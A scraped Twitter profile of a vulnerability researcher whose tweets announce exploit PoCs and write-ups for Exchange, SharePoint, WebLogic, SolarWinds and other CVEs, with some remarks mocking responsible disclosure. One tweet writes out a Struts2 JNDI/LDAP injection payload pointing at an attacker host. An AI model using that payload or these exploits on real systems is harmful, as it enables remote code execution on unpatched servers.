Janggggg Profile Banner
Janggggg Profile
Janggggg

@testanull

8,439
Followers
141
Following
177
Media
1,069
Statuses

Kẻ soi mói, Re-searcher @dfsec_com

Hanoi, Vietnam
Joined October 2015
Don't wanna be here? Send us removal request.
@testanull
Janggggg
2 years
Tweet media one
17
190
1K
@testanull
Janggggg
2 years
CVE-2022-36804 PoC 🧐
Tweet media one
12
326
1K
@testanull
Janggggg
2 years
You guys must be waiting for this, So this is the working PoC script of the Exchange 0day exploited ITW
8
242
710
@testanull
Janggggg
3 years
As many ppl requested, Here is the PoC of CVE-2021-42321, Exchange Post-Auth RCE This PoC just pop mspaint.exe on the target, can be use to recognize the signature pattern of a successful attack event
2
287
683
@testanull
Janggggg
2 years
Hey look, I've just found a seRioUs vulnerability in Java System.out.println() method Just by executing System.out.println() with a malicious Object with the method toString() is override, our mAlicIous code will get executed remotely ( ͡° ͜ʖ ͡°)
Tweet media one
34
93
624
@testanull
Janggggg
4 years
Analysis of CVE-2020-14882 Weblogic RCE via HTTP CVSS 9.8/10 Hope you enjoy it ;) Thanks an anonymous man for supporting!
9
244
612
@testanull
Janggggg
2 years
Lol The URL pattern to detect/prevent the Exchange 0day provided in MSRC's blog post can easily be bypassed @GossiTheDog
Tweet media one
13
154
597
@testanull
Janggggg
3 years
Trying to figure out which line's containing wrong indentation...
Tweet media one
29
55
576
@testanull
Janggggg
1 year
Tweet media one
6
53
551
@testanull
Janggggg
3 years
Tweet media one
3
80
543
@testanull
Janggggg
3 years
Struts2 RCE PoC/IoC: /$%7bjndi:ldap:/$%7blower:/%7d192.168.139.1:1389/o=tomcat%7d$%7blower:/%7d/ Disclaimer: This isn't an 0day, It has already been mentioned as vulnerable in many Chinese blog post *this really reminds me of SpEL injection
3
145
457
@testanull
Janggggg
3 years
As promised, Here is the detail and a part of PoC about the OAM Pre-Auth RCE (CVE-2021-35587) It may require more work to get fully functional PoC, Have fun with it! cc @peterjson
10
208
450
@testanull
Janggggg
5 years
I just published The Art of Deserialization Gadget Hunting [part 3] (How I found CVE-2020–2555 by known tools!)
5
168
436
@testanull
Janggggg
3 years
Just published detailed analysis of Microsoft Exchange Deserialization to RCE (CVE-2021-42321), which's also found exploited in Tianfu Cup. English version from @peterjson PoC is not provided, Have fun!
4
178
416
@testanull
Janggggg
10 months
MS finally replys to our email and allow us to public more details about the Auth bypass and Code Injection chain in SharePoint, which was used in Pwn2Own Vancouver 2023. Here is the (not-so) fully working PoC for that: Have a nice weekend! ;)
5
133
408
@testanull
Janggggg
3 years
CVE-2021-35587 Oracle Access Manager Pre-Auth RCE found by me and @peterjson Blog post will be published soon, stay tuned!
4
119
396
@testanull
Janggggg
3 years
Finally got direct shell of CVE-2021-21985 without RMI
8
78
354
@testanull
Janggggg
5 months
Tweet media one
2
45
353
@testanull
Janggggg
3 years
CVE-2021–31474 SolarWinds Orion Deserialization PoC
5
102
339
@testanull
Janggggg
3 years
Tweet media one
7
64
332
@testanull
Janggggg
3 years
Just published some details about the CVE-2021–35215, SolarWinds Orion Deserialization to RCE. The second part will come with 3 more bugs of Deserialization in SolarWinds 🤣. #pocfriday
3
115
312
@testanull
Janggggg
2 years
Successfully reproduced the Gitlab Project Import RCE (CVE-2022-2185) Got headache while reading Ruby for last 2 weeks, but it worth definitely digging in Have good read!
3
117
305
@testanull
Janggggg
2 years
Exchange TabShell RCE PoC (CVE-2022-41076) (Just copy paste the poc from @vcslab 's blog post) Still wondering why this vulnerability is so underrated xD PoC script (for copy paste purpose):
2
95
307
@testanull
Janggggg
5 years
CVE-2020-7961 direct shell PoC Generator: Payload: Blog post in Vietnamese: Much respect to @codewhitesec and @ mbechler
Tweet media one
1
120
291
@testanull
Janggggg
3 years
Here is the final part of SolarWinds Orion Deserialization (CVE-2021-35218) This vulnerability can be triggered without any authentication, *It's sad that ZDI didn't accept this as an Pre-Auth RCE Kudo @Y4er_ChaBug for detailed analysis!
2
88
245
@testanull
Janggggg
4 years
It's possible to chain the ProxyLogon with DlpPolicy bug to directly running command in the server Ref:
3
93
242
@testanull
Janggggg
3 months
Here is the PoC for MS SharePoint bugs fixed in this month's patch :) Responsible Disclosure is a joke
3
75
241
@testanull
Janggggg
1 year
Proper way to handle long if-else statement in IDA 👍
Tweet media one
7
21
237
@testanull
Janggggg
3 years
Nice work! Here is another one ...
Tweet media one
3
50
228
@testanull
Janggggg
3 years
What If Struts2 uses Log4j2 ...
Tweet media one
5
32
210
@testanull
Janggggg
3 years
Still don't know if this is CVE-2021-28482 or CVE-2021-28483 But it's posibble to take down Exchange with a low privilege user
5
55
205
@testanull
Janggggg
7 months
More details about the vulnerability I brought to last p2o (which is not success) Many lessons were learnt from this failure Hope it will help someone who’s working as a system admin or a researcher ?
2
49
193
@testanull
Janggggg
3 years
Another approach to get RCE of CVE-2021-22005, Work with most case, doesn't require CEIP to be enabled, "..;/" is not dead CC @wvuuuuuuuuuuuuu ,
7
38
173
@testanull
Janggggg
3 years
About the CVE-2021-26084, It's a Pre-Auth RCE vulnerability by default, even if the Sign-Up function is disabled. Patch your server before the PoC is released! cc @rootxharsh @iamnoooob @peterjson
3
25
172
@testanull
Janggggg
1 year
Thumbnails for upcoming blog post …
Tweet media one
4
32
166
@testanull
Janggggg
5 years
It 's fun to drop a RCE and watch the world burn ;)
Tweet media one
2
18
154
@testanull
Janggggg
1 year
Our team @starlabs_sg has successfully reproduced the PreAuth RCE via WAN in ZyWall device :) We can confirm this vulnerability can be exploited via WAN even with the default config of ZyWall device It's still not too late to patch your device, so do it ASAP! GG @TrapaSecurity
Tweet media one
5
26
152
@testanull
Janggggg
3 years
Confirmed!
@vxunderground
vx-underground
3 years
A Java Springcore RCE 0day exploit has been leaked. It was leaked by a Chinese security researcher who, since sharing and/or leaking it, has deleted their Twitter account. We have not verified the exploit. tl;dr big if true Download the 0day POC here:
30
419
1K
6
31
132
@testanull
Janggggg
2 years
GGWP! Great blog and also very detailed PoC about breaking the Google Nest Hub gen 2 bootloader
Tweet media one
3
25
128
@testanull
Janggggg
2 years
Good job MS :)! Left my Exchange lab running for hours with internet and it got patched automatically
Tweet media one
5
28
127
@testanull
Janggggg
1 year
It’s happening, someone is using Zyxel PoC to scan the whole internet.
Tweet media one
@stephenfewer
Stephen Fewer
1 year
Our @rapid7 AttackerKB analysis detailing CVE-2023-28771 is available. Unauthenticated command injection on the WAN interface of several Zyxel devices. Bug is in the IKE packet decoder for the IPSec VPN service, running by default.
2
36
112
2
30
123
@testanull
Janggggg
9 months
Just want to announce that I’m officially a part of @dfsec_com today!
16
2
122
@testanull
Janggggg
3 years
Tweet media one
6
12
106
@testanull
Janggggg
2 years
Last week, in the HITB SECCONF, i saw an interesting challenge: linkextractor which have many way to solve, My solution is to abuse the insecure deserialization bug to get RCE It's also the renew of MozillaRhino to work with new JDK! Have a good read! ;)
1
28
109
@testanull
Janggggg
3 years
Quick confirm that this is the real PoC of CVE-2021-21985 👍
Tweet media one
2
31
102
@testanull
Janggggg
3 years
Continue on CVE-2021-26084 There was some tweet telling that block the entrypoint "/pages/createpage-entervariables.action" will reduce the risk. But it's not enough, After rechecking, there're more than 2 entrypoints can be used with the Pre-Auth RCE. RT wisely!
3
21
102
@testanull
Janggggg
7 months
CVE-2024-21426 & CVE-2024-26198 Attacker be like:
Tweet media one
0
8
101
@testanull
Janggggg
4 years
PoC of 26855 Have fun ;)
Tweet media one
2
34
99
@testanull
Janggggg
1 year
It was not until 2 hours before deadline, Samsung has patched the first bug. Luckily, the bypass one was found 15 minutes later, As always, Vietnamese version is also available here: Happy reading!
Tweet media one
@starlabs_sg
starlabs
1 year
The Old, The New and The Bypass - One-click/Open-redirect to own Samsung S22 at Pwn2Own 2022 written by @testanull Thanks to @thezdi for reviewing and inputs to the blog post. Greatly appreciate that.
0
60
179
0
17
95
@testanull
Janggggg
2 years
*me
Tweet media one
1
3
93
@testanull
Janggggg
3 years
Guess what products 🤔
Tweet media one
3
11
90
@testanull
Janggggg
2 years
10 steps to quickly gain followers on twitter Step 1: Threatening to public a 0day ... Congratz! You are now being followed by many Threat Intelligence bot/user.
Tweet media one
2
4
83
@testanull
Janggggg
1 year
Tweet media one
1
16
81
@testanull
Janggggg
4 years
Got 2nd place in recent @GHSecurityLab CodeQL CTF Here is my writeup: Thanks @pwntester , @XCorail and @GHSecurityLab for a great CTF chall
0
21
80
@testanull
Janggggg
3 years
@cyb3rops Verified with the relevant case of VCenter To use with VCenter, you may want to change the path into "/storage/log/vmware/"
Tweet media one
0
23
78
@testanull
Janggggg
2 years
1
19
78
@testanull
Janggggg
5 months
Tweet media one
1
6
76
@testanull
Janggggg
2 years
It's fire ...
4
6
77
@testanull
Janggggg
4 months
As someone said: Responsible Disclosure is killing the 0day industry :)
Tweet media one
1
7
76
@testanull
Janggggg
3 years
I can see that many people have completed the PoC, So this's my full version of the vCenter RCE, Have fun with it ;)!
1
22
75
@testanull
Janggggg
1 year
*me these days
@testanull
Janggggg
2 years
Tweet media one
17
190
1K
3
8
70
@testanull
Janggggg
2 years
@cyb3rops You’re not the only one who read it, just skip it when you find it’s not useful for your work. Our work is not about writing the indicators of the exploit, it’s yours :)
2
5
72
@testanull
Janggggg
4 years
2
16
70
@testanull
Janggggg
3 years
It's time to extend the sink of gadgetinspector
Tweet media one
4
3
66
@testanull
Janggggg
2 years
There's nothing new here, it's just a translated version of the original Chinese blog post, It would be easier for Google Translate to translate from VNese to English xD
1
8
63
@testanull
Janggggg
2 years
*my colleague: Why do they put shellcode in your name xD
Tweet media one
1
3
62
@testanull
Janggggg
1 year
PoC for the Inductive Automation Ignition Client RCE 0day
2
8
59
@testanull
Janggggg
1 year
Also check out the Vietnamese version ;)
@starlabs_sg
starlabs
1 year
Are you ready for a deep dive into MS Sharepoint? Our team member, @testanull ,is sharing with everyone his latest blog post. [P2O Vancouver 2023] SharePoint Pre-Auth RCE chain (CVE-2023–29357 & CVE-2023–24955) We hope that everyone enjoyed reading it
2
117
266
4
13
58
@testanull
Janggggg
3 years
Tweet media one
1
3
58
@testanull
Janggggg
2 years
Tweet media one
0
1
56
@testanull
Janggggg
1 year
Retweet due to so many people asked for the gadgetchain of CVE-2021-35587 in OAM 10g, The step to reproduce it has already been provided in section "Universal gadget chain for 10.3.x" Detail:
Tweet media one
0
13
54
@testanull
Janggggg
4 years
Tweet media one
2
6
53
@testanull
Janggggg
3 years
Here come the T24 ft Log4j2
0
13
52
@testanull
Janggggg
3 months
I don’t really care much about the credit story, but this guy is trying to clone my blog post and claim all of credits in the org post. I have no idea about their purpose but be careful while working with them
Tweet media one
Tweet media two
3
5
52
@testanull
Janggggg
3 years
Look like someone is trying to mitigate the Log4j
Tweet media one
1
3
47
@testanull
Janggggg
1 year
Tweet media one
@infosec_au
shubs
1 year
For the first 3-4 years that i was working in infosec, I found client side security so exciting. I stayed on top of every new technique and studied new techniques closely. After this, I took a step back and realised that all of my work on client side security felt helpless,
24
54
512
4
8
49
@testanull
Janggggg
1 year
So true
@LiveOverflow
LiveOverflow 🔴
1 year
Web Security vs. Binary Exploitation
107
2K
11K
1
4
48
@testanull
Janggggg
1 year
Tweet media one
0
2
47
@testanull
Janggggg
1 year
Fact: Metabase doesn't release the fixed code in their "oPen-SouRce" repository So basically, If you're naively using their open-source version, you're still vulnerable!
Tweet media one
1
5
45
@testanull
Janggggg
4 years
A few words about the CVE-2020-4280 - IBM QRadar Java Deserialization and the patch of it
1
15
46
@testanull
Janggggg
3 months
Wtf??? It has been more than 6 months and they still don’t have any action on my reported bug wE treAt sEcUriTy seRioUsly What a joke
@thezdi
Zero Day Initiative
3 months
It's Patch Tuesday once more. While #Adobe had a tiny release, #Microsoft had one of their biggest months ever - including two 0-days under active attack. Join @dustin_childs as he breaks down all the details.
2
24
64
1
2
46